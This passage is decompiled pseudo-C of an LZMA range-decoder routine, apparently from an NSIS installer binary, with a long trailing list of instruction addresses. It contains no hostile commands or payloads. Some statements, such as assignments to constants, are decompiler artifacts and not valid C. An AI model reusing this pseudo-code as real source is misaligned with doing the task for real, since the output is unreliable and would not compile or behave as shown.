												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t156 = __ebp - 0x70;
												 *_t156 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t156;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												while(1) {
													L48:
													__eflags = __ebx - 0x100;
													if(__ebx >= 0x100) {
														break;
													}
													__eax =  *(__ebp - 0x58);
													__edx = __ebx + __ebx;
													__ecx =  *(__ebp - 0x10);
													__esi = __edx + __eax;
													__ecx =  *(__ebp - 0x10) >> 0xb;
													__ax =  *__esi;
													 *(__ebp - 0x54) = __esi;
													__edi = __ax & 0x0000ffff;
													__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
													__eflags =  *(__ebp - 0xc) - __ecx;
													if( *(__ebp - 0xc) >= __ecx) {
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
														__cx = __ax;
														_t170 = __edx + 1; // 0x1
														__ebx = _t170;
														__cx = __ax >> 5;
														__eflags = __eax;
														 *__esi = __ax;
													} else {
														 *(__ebp - 0x10) = __ecx;
														0x800 = 0x800 - __edi;
														0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
														__ebx = __ebx + __ebx;
														 *__esi = __cx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0x10) >= 0x1000000) {
														continue;
													} else {
														goto L46;
													}
												}
												L54:
												_t173 = __ebp - 0x34;
												 *_t173 =  *(__ebp - 0x34) & 0x00000000;
												__eflags =  *_t173;
												goto L55;
											case 0xf:
												L58:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xf;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t203 = __ebp - 0x70;
												 *_t203 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t203;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L60:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													L55:
													__al =  *(__ebp - 0x44);
													 *(__ebp - 0x5c) =  *(__ebp - 0x44);
													goto L56;
												}
												L61:
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t217 = __edx + 1; // 0x1
													__ebx = _t217;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L60;
												} else {
													goto L58;
												}
											case 0x10:
												L109:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x10;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t365 = __ebp - 0x70;
												 *_t365 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t365;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												goto L111;
											case 0x11:
												goto L69;
											case 0x12:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 0x58);
													 *(__ebp - 0x84) = 0x13;
													__esi =  *(__ebp - 0x58) + 2;
													while(1) {
														L132:
														 *(_t613 - 0x54) = _t606;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x4c);
												 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												__eflags = __eax;
												__eax =  *(__ebp - 0x58) + __eax + 4;
												goto L130;
											case 0x13:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													_t469 = __ebp - 0x58;
													 *_t469 =  *(__ebp - 0x58) + 0x204;
													__eflags =  *_t469;
													 *(__ebp - 0x30) = 0x10;
													 *(__ebp - 0x40) = 8;
													L144:
													 *(__ebp - 0x7c) = 0x14;
													goto L145;
												}
												__eax =  *(__ebp - 0x4c);
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												 *(__ebp - 0x30) = 8;
												__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
												L130:
												 *(__ebp - 0x58) = __eax;
												 *(__ebp - 0x40) = 3;
												goto L144;
											case 0x14:
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
												__eax =  *(__ebp - 0x80);
												 *(_t613 - 0x88) = _t533;
												goto L1;
											case 0x15:
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xb;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
												goto L120;
											case 0x16:
												__eax =  *(__ebp - 0x30);
												__eflags = __eax - 4;
												if(__eax >= 4) {
													_push(3);
													_pop(__eax);
												}
												__ecx =  *(__ebp - 4);
												 *(__ebp - 0x40) = 6;
												__eax = __eax << 7;
												 *(__ebp - 0x7c) = 0x19;
												 *(__ebp - 0x58) = __eax;
												goto L145;
											case 0x17:
												L145:
												__eax =  *(__ebp - 0x40);
												 *(__ebp - 0x50) = 1;
												 *(__ebp - 0x48) =  *(__ebp - 0x40);
												goto L149;
											case 0x18:
												L146:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x18;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t484 = __ebp - 0x70;
												 *_t484 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t484;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L148:
												_t487 = __ebp - 0x48;
												 *_t487 =  *(__ebp - 0x48) - 1;
												__eflags =  *_t487;
												L149:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__ecx =  *(__ebp - 0x40);
													__ebx =  *(__ebp - 0x50);
													0 = 1;
													__eax = 1 << __cl;
													__ebx =  *(__ebp - 0x50) - (1 << __cl);
													__eax =  *(__ebp - 0x7c);
													 *(__ebp - 0x44) = __ebx;
													while(1) {
														 *(_t613 - 0x88) = _t533;
														goto L1;
													}
												}
												__eax =  *(__ebp - 0x50);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
												__eax =  *(__ebp - 0x58);
												__esi = __edx + __eax;
												 *(__ebp - 0x54) = __esi;
												__ax =  *__esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													__cx = __ax >> 5;
													__eax = __eax - __ecx;
													__edx = __edx + 1;
													__eflags = __edx;
													 *__esi = __ax;
													 *(__ebp - 0x50) = __edx;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L148;
												} else {
													goto L146;
												}
											case 0x19:
												__eflags = __ebx - 4;
												if(__ebx < 4) {
													 *(__ebp - 0x2c) = __ebx;
													L119:
													_t393 = __ebp - 0x2c;
													 *_t393 =  *(__ebp - 0x2c) + 1;
													__eflags =  *_t393;
													L120:
													__eax =  *(__ebp - 0x2c);
													__eflags = __eax;
													if(__eax == 0) {
														 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
														goto L170;
													}
													__eflags = __eax -  *(__ebp - 0x60);
													if(__eax >  *(__ebp - 0x60)) {
														goto L171;
													}
													 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
													__eax =  *(__ebp - 0x30);
													_t400 = __ebp - 0x60;
													 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
													__eflags =  *_t400;
													goto L123;
												}
												__ecx = __ebx;
												__eax = __ebx;
												__ecx = __ebx >> 1;
												__eax = __ebx & 0x00000001;
												__ecx = (__ebx >> 1) - 1;
												__al = __al | 0x00000002;
												__eax = (__ebx & 0x00000001) << __cl;
												__eflags = __ebx - 0xe;
												 *(__ebp - 0x2c) = __eax;
												if(__ebx >= 0xe) {
													__ebx = 0;
													 *(__ebp - 0x48) = __ecx;
													L102:
													__eflags =  *(__ebp - 0x48);
													if( *(__ebp - 0x48) <= 0) {
														__eax = __eax + __ebx;
														 *(__ebp - 0x40) = 4;
														 *(__ebp - 0x2c) = __eax;
														__eax =  *(__ebp - 4);
														__eax =  *(__ebp - 4) + 0x644;
														__eflags = __eax;
														L108:
														__ebx = 0;
														 *(__ebp - 0x58) = __eax;
														 *(__ebp - 0x50) = 1;
														 *(__ebp - 0x44) = 0;
														 *(__ebp - 0x48) = 0;
														L112:
														__eax =  *(__ebp - 0x40);
														__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
														if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
															_t391 = __ebp - 0x2c;
															 *_t391 =  *(__ebp - 0x2c) + __ebx;
															__eflags =  *_t391;
															goto L119;
														}
														__eax =  *(__ebp - 0x50);
														 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
														__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
														__eax =  *(__ebp - 0x58);
														__esi = __edi + __eax;
														 *(__ebp - 0x54) = __esi;
														__ax =  *__esi;
														__ecx = __ax & 0x0000ffff;
														__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
														__eflags =  *(__ebp - 0xc) - __edx;
														if( *(__ebp - 0xc) >= __edx) {
															__ecx = 0;
															 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
															__ecx = 1;
															 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
															__ebx = 1;
															__ecx =  *(__ebp - 0x48);
															__ebx = 1 << __cl;
															__ecx = 1 << __cl;
															__ebx =  *(__ebp - 0x44);
															__ebx =  *(__ebp - 0x44) | __ecx;
															__cx = __ax;
															__cx = __ax >> 5;
															__eax = __eax - __ecx;
															__edi = __edi + 1;
															__eflags = __edi;
															 *(__ebp - 0x44) = __ebx;
															 *__esi = __ax;
															 *(__ebp - 0x50) = __edi;
														} else {
															 *(__ebp - 0x10) = __edx;
															0x800 = 0x800 - __ecx;
															0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
															 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
															 *__esi = __dx;
														}
														__eflags =  *(__ebp - 0x10) - 0x1000000;
														if( *(__ebp - 0x10) >= 0x1000000) {
															L111:
															_t368 = __ebp - 0x48;
															 *_t368 =  *(__ebp - 0x48) + 1;
															__eflags =  *_t368;
															goto L112;
														} else {
															goto L109;
														}
													}
													__ecx =  *(__ebp - 0xc);
													__ebx = __ebx + __ebx;
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
													__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
														__ecx =  *(__ebp - 0x10);
														 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
														__ebx = __ebx | 0x00000001;
														__eflags = __ebx;
														 *(__ebp - 0x44) = __ebx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L101:
														_t338 = __ebp - 0x48;
														 *_t338 =  *(__ebp - 0x48) - 1;
														__eflags =  *_t338;
														goto L102;
													} else {
														goto L99;
													}
												}
												__edx =  *(__ebp - 4);
												__eax = __eax - __ebx;
												 *(__ebp - 0x40) = __ecx;
												__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
												goto L108;
											case 0x1a:
												L56:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1a;
													goto L170;
												}
												__ecx =  *(__ebp - 0x68);
												__al =  *(__ebp - 0x5c);
												__edx =  *(__ebp - 8);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *( *(__ebp - 0x68)) = __al;
												__ecx =  *(__ebp - 0x14);
												 *(__ecx +  *(__ebp - 8)) = __al;
												__eax = __ecx + 1;
												__edx = 0;
												_t192 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t192;
												goto L80;
											case 0x1b:
												L76:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1b;
													goto L170;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t275 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t275;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												_t284 = __ebp - 0x64;
												 *_t284 =  *(__ebp - 0x64) - 1;
												__eflags =  *_t284;
												 *( *(__ebp - 0x68)) = __cl;
												L80:
												 *(__ebp - 0x14) = __edx;
												goto L81;
											case 0x1c:
												while(1) {
													L123:
													__eflags =  *(__ebp - 0x64);
													if( *(__ebp - 0x64) == 0) {
														break;
													}
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__edx =  *(__ebp - 8);
													__cl =  *(__eax + __edx);
													__eax =  *(__ebp - 0x14);
													 *(__ebp - 0x5c) = __cl;
													 *(__eax + __edx) = __cl;
													__eax = __eax + 1;
													__edx = 0;
													_t414 = __eax %  *(__ebp - 0x74);
													__eax = __eax /  *(__ebp - 0x74);
													__edx = _t414;
													__eax =  *(__ebp - 0x68);
													 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
													 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
													 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
													__eflags =  *(__ebp - 0x30);
													 *( *(__ebp - 0x68)) = __cl;
													 *(__ebp - 0x14) = _t414;
													if( *(__ebp - 0x30) > 0) {
														continue;
													} else {
														L81:
														 *(__ebp - 0x88) = 2;
														goto L1;
													}
												}
												 *(__ebp - 0x88) = 0x1c;
												goto L170;
										}
									}
									L171:
									_t535 = _t534 | 0xffffffff;
									goto L172;
								}
							}
						}
					}
					goto L1;
				}
			}













                0x00000000
                0x00406591
                0x00406591
                0x00406595
                0x004065a2
                0x004065ac
                0x00000000
                0x00406597
                0x00406597
                0x004065d2
                0x004065d5
                0x004065d8
                0x004065db
                0x004065db
                0x004065de
                0x004065e5
                0x004065ea
                0x004064cb
                0x004064ce
                0x00406840
                0x00406840
                0x00406840
                0x00406843
                0x00406843
                0x00406843
                0x00406849
                0x0040684f
                0x00406855
                0x0040686f
                0x00406872
                0x00406878
                0x00406883
                0x00406885
                0x00406857
                0x00406857
                0x00406866
                0x0040686a
                0x0040686a
                0x0040688f
                0x00000000
                0x00000000
                0x00406891
                0x00406895
                0x00406a44
                0x00406a5a
                0x00406a62
                0x00406a69
                0x00406a6b
                0x00406a72
                0x00406a76
                0x00406a76
                0x004068a1
                0x004068a8
                0x004068b0
                0x004068b3
                0x004068b6
                0x004068b6
                0x004068bc
                0x004068bc
                0x00406058
                0x00406058
                0x00406058
                0x00406061
                0x00000000
                0x00000000
                0x00406067
                0x00000000
                0x00406072
                0x00000000
                0x00000000
                0x0040607b
                0x0040607e
                0x00406081
                0x00406085
                0x00000000
                0x00000000
                0x0040608b
                0x0040608e
                0x00406090
                0x00406091
                0x00406094
                0x00406096
                0x00406097
                0x00406099
                0x0040609c
                0x004060a1
                0x004060a6
                0x004060af
                0x004060c2
                0x004060c5
                0x004060d1
                0x004060f9
                0x004060fb
                0x00406109
                0x00406109
                0x0040610d
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x004060fd
                0x004060fd
                0x00406100
                0x00406101
                0x00406101
                0x00000000
                0x004060fd
                0x004060d7
                0x004060dc
                0x004060dc
                0x004060e5
                0x004060ed
                0x004060f0
                0x00000000
                0x004060f6
                0x004060f6
                0x00000000
                0x004060f6
                0x00000000
                0x00406113
                0x00406113
                0x00406117
                0x004069c3
                0x00000000
                0x004069c3
                0x00406120
                0x00406130
                0x00406133
                0x00406136
                0x00406136
                0x00406136
                0x00406139
                0x0040613d
                0x00000000
                0x00000000
                0x0040613f
                0x00406145
                0x0040616f
                0x00406175
                0x0040617c
                0x00000000
                0x0040617c
                0x0040614b
                0x0040614e
                0x00406153
                0x00406153
                0x0040615e
                0x00406166
                0x00406169
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x004061ae
                0x004061b4
                0x004061b7
                0x004061c4
                0x004061cc
                0x00406840
                0x00406840
                0x00000000
                0x00000000
                0x00406183
                0x00406183
                0x00406187
                0x004069d2
                0x00000000
                0x004069d2
                0x00406193
                0x0040619e
                0x0040619e
                0x0040619e
                0x004061a1
                0x004061a4
                0x004061a7
                0x004061ac
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00406843
                0x00406843
                0x00406849
                0x0040684f
                0x00406855
                0x0040686f
                0x00406872
                0x00406878
                0x00406883
                0x00406885
                0x00406857
                0x00406857
                0x00406866
                0x0040686a
                0x0040686a
                0x0040688f
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x004061d4
                0x004061d6
                0x004061d9
                0x0040624a
                0x0040624d
                0x00406250
                0x00406257
                0x00406261
                0x00406840
                0x00406840
                0x00406840
                0x00000000
                0x00406840
                0x00406840
                0x004061db
                0x004061df
                0x004061e2
                0x004061e4
                0x004061e7
                0x004061ea
                0x004061ec
                0x004061ef
                0x004061f1
                0x004061f6
                0x004061f9
                0x004061fc
                0x00406200
                0x00406207
                0x0040620a
                0x00406211
                0x00406215
                0x0040621d
                0x0040621d
                0x0040621d
                0x00406217
                0x00406217
                0x00406217
                0x0040620c
                0x0040620c
                0x0040620c
                0x00406221
                0x00406224
                0x00406242
                0x00406244
                0x00000000
                0x00406226
                0x00406226
                0x00406229
                0x0040622c
                0x0040622f
                0x00406231
                0x00406231
                0x00406231
                0x00406234
                0x00406237
                0x00406239
                0x0040623a
                0x0040623d
                0x00000000
                0x0040623d
                0x00000000
                0x00406473
                0x00406477
                0x00406495
                0x00406498
                0x0040649f
                0x004064a2
                0x004064a5
                0x004064a8
                0x004064ab
                0x004064ae
                0x004064b0
                0x004064b7
                0x004064b8
                0x004064ba
                0x004064bd
                0x004064c0
                0x004064c3
                0x004064c3
                0x004064c8
                0x00000000
                0x004064c8
                0x00406479
                0x0040647c
                0x0040647f
                0x00406489
                0x00406840
                0x00406840
                0x00406840
                0x00000000
                0x00406840
                0x00000000
                0x004064dd
                0x004064e1
                0x00406504
                0x00406507
                0x0040650a
                0x00406514
                0x004064e3
                0x004064e3
                0x004064e6
                0x004064e9
                0x004064ec
                0x004064f9
                0x004064fc
                0x004064fc
                0x00406840
                0x00406840
                0x00406840
                0x00000000
                0x00406840
                0x00000000
                0x00406520
                0x00406524
                0x00000000
                0x00000000
                0x0040652a
                0x0040652e
                0x00000000
                0x00000000
                0x00406534
                0x00406536
                0x0040653a
                0x0040653a
                0x0040653d
                0x00406541
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x004065b8
                0x004065bc
                0x004065c3
                0x004065c6
                0x004065c9
                0x004065be
                0x004065be
                0x004065be
                0x004065cc
                0x004065cf
                0x00000000
                0x00000000
                0x00406678
                0x00406678
                0x0040667c
                0x00406a1a
                0x00000000
                0x00406a1a
                0x00406682
                0x00406685
                0x00406688
                0x0040668c
                0x0040668f
                0x00406695
                0x00406697
                0x00406697
                0x00406697
                0x0040669a
                0x0040669d
                0x00000000
                0x00000000
                0x0040626d
                0x0040626d
                0x00406271
                0x004069de
                0x00000000
                0x004069de
                0x00406277
                0x0040627a
                0x0040627d
                0x00406281
                0x00406284
                0x0040628a
                0x0040628c
                0x0040628c
                0x0040628c
                0x0040628f
                0x00406292
                0x00406292
                0x00406295
                0x00406298
                0x00000000
                0x00000000
                0x0040629e
                0x004062a4
                0x00000000
                0x00000000
                0x004062aa
                0x004062aa
                0x004062ae
                0x004062b1
                0x004062b4
                0x004062b7
                0x004062ba
                0x004062bb
                0x004062be
                0x004062c0
                0x004062c6
                0x004062c9
                0x004062cc
                0x004062cf
                0x004062d2
                0x004062d5
                0x004062d8
                0x004062f4
                0x004062f7
                0x004062fa
                0x004062fd
                0x00406304
                0x00406308
                0x0040630a
                0x0040630e
                0x004062da
                0x004062da
                0x004062de
                0x004062e6
                0x004062eb
                0x004062ed
                0x004062ef
                0x004062ef
                0x00406311
                0x00406318
                0x0040631b
                0x00000000
                0x00406321
                0x00000000
                0x00406321
                0x00000000
                0x00406326
                0x00406326
                0x0040632a
                0x004069ea
                0x00000000
                0x004069ea
                0x00406330
                0x00406333
                0x00406336
                0x0040633a
                0x0040633d
                0x00406343
                0x00406345
                0x00406345
                0x00406345
                0x00406348
                0x0040634b
                0x0040634b
                0x0040634b
                0x00406351
                0x00000000
                0x00000000
                0x00406353
                0x00406356
                0x00406359
                0x0040635c
                0x0040635f
                0x00406362
                0x00406365
                0x00406368
                0x0040636b
                0x0040636e
                0x00406371
                0x00406389
                0x0040638c
                0x0040638f
                0x00406392
                0x00406392
                0x00406395
                0x00406399
                0x0040639b
                0x00406373
                0x00406373
                0x0040637b
                0x00406380
                0x00406382
                0x00406384
                0x00406384
                0x0040639e
                0x004063a5
                0x004063a8
                0x00000000
                0x004063aa
                0x00000000
                0x004063aa
                0x004063a8
                0x004063af
                0x004063af
                0x004063af
                0x004063af
                0x00000000
                0x00000000
                0x004063ea
                0x004063ea
                0x004063ee
                0x004069f6
                0x00000000
                0x004069f6
                0x004063f4
                0x004063f7
                0x004063fa
                0x004063fe
                0x00406401
                0x00406407
                0x00406409
                0x00406409
                0x00406409
                0x0040640c
                0x0040640f
                0x0040640f
                0x00406415
                0x004063b3
                0x004063b3
                0x004063b6
                0x00000000
                0x004063b6
                0x00406417
                0x00406417
                0x0040641a
                0x0040641d
                0x00406420
                0x00406423
                0x00406426
                0x00406429
                0x0040642c
                0x0040642f
                0x00406432
                0x00406435
                0x0040644d
                0x00406450
                0x00406453
                0x00406456
                0x00406456
                0x00406459
                0x0040645d
                0x0040645f
                0x00406437
                0x00406437
                0x0040643f
                0x00406444
                0x00406446
                0x00406448
                0x00406448
                0x00406462
                0x00406469
                0x0040646c
                0x00000000
                0x0040646e
                0x00000000
                0x0040646e
                0x00000000
                0x004066fb
                0x004066fb
                0x004066ff
                0x00406a26
                0x00000000
                0x00406a26
                0x00406705
                0x00406708
                0x0040670b
                0x0040670f
                0x00406712
                0x00406718
                0x0040671a
                0x0040671a
                0x0040671a
                0x0040671d
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x0040680a
                0x0040680e
                0x00406830
                0x00406833
                0x0040683d
                0x00406840
                0x00406840
                0x00406840
                0x00000000
                0x00406840
                0x00406840
                0x00406810
                0x00406813
                0x00406817
                0x0040681a
                0x0040681a
                0x0040681d
                0x00000000
                0x00000000
                0x004068c7
                0x004068cb
                0x004068e9
                0x004068e9
                0x004068e9
                0x004068f0
                0x004068f7
                0x004068fe
                0x004068fe
                0x00000000
                0x004068fe
                0x004068cd
                0x004068d0
                0x004068d3
                0x004068d6
                0x004068dd
                0x00406821
                0x00406821
                0x00406824
                0x00000000
                0x00000000
                0x004069b8
                0x004069bb
                0x004068bc
                0x00000000
                0x00000000
                0x004065f2
                0x004065f4
                0x004065fb
                0x004065fc
                0x004065fe
                0x00406601
                0x00000000
                0x00000000
                0x00406609
                0x0040660c
                0x0040660f
                0x00406611
                0x00406613
                0x00406613
                0x00406614
                0x00406617
                0x0040661e
                0x00406621
                0x0040662f
                0x00000000
                0x00000000
                0x00406905
                0x00406905
                0x00406908
                0x0040690f
                0x00000000
                0x00000000
                0x00406914
                0x00406914
                0x00406918
                0x00406a50
                0x00000000
                0x00406a50
                0x0040691e
                0x00406921
                0x00406924
                0x00406928
                0x0040692b
                0x00406931
                0x00406933
                0x00406933
                0x00406933
                0x00406936
                0x00406939
                0x00406939
                0x00406939
                0x00406939
                0x0040693c
                0x0040693c
                0x00406940
                0x004069a0
                0x004069a3
                0x004069a8
                0x004069a9
                0x004069ab
                0x004069ad
                0x004069b0
                0x004068bc
                0x004068bc
                0x00000000
                0x004068c2
                0x004068bc
                0x00406942
                0x00406948
                0x0040694b
                0x0040694e
                0x00406951
                0x00406954
                0x00406957
                0x0040695a
                0x0040695d
                0x00406960
                0x00406963
                0x0040697c
                0x0040697f
                0x00406982
                0x00406985
                0x00406989
                0x0040698b
                0x0040698b
                0x0040698c
                0x0040698f
                0x00406965
                0x00406965
                0x0040696d
                0x00406972
                0x00406974
                0x00406977
                0x00406977
                0x00406992
                0x00406999
                0x00000000
                0x0040699b
                0x00000000
                0x0040699b
                0x00000000
                0x00406637
                0x0040663a
                0x00406670
                0x004067a0
                0x004067a0
                0x004067a0
                0x004067a0
                0x004067a3
                0x004067a3
                0x004067a6
                0x004067a8
                0x00406a32
                0x00000000
                0x00406a32
                0x004067ae
                0x004067b1
                0x00000000
                0x00000000
                0x004067b7
                0x004067bb
                0x004067be
                0x004067be
                0x004067be
                0x00000000
                0x004067be
                0x0040663c
                0x0040663e
                0x00406640
                0x00406642
                0x00406645
                0x00406646
                0x00406648
                0x0040664a
                0x0040664d
                0x00406650
                0x00406666
                0x0040666b
                0x004066a3
                0x004066a3
                0x004066a7
                0x004066d3
                0x004066d5
                0x004066dc
                0x004066df
                0x004066e2
                0x004066e2
                0x004066e7
                0x004066e7
                0x004066e9
                0x004066ec
                0x004066f3
                0x004066f6
                0x00406723
                0x00406723
                0x00406726
                0x00406729
                0x0040679d
                0x0040679d
                0x0040679d
                0x00000000
                0x0040679d
                0x0040672b
                0x00406731
                0x00406734
                0x00406737
                0x0040673a
                0x0040673d
                0x00406740
                0x00406743
                0x00406746
                0x00406749
                0x0040674c
                0x00406765
                0x00406767
                0x0040676a
                0x0040676b
                0x0040676e
                0x00406770
                0x00406773
                0x00406775
                0x00406777
                0x0040677a
                0x0040677c
                0x0040677f
                0x00406783
                0x00406785
                0x00406785
                0x00406786
                0x00406789
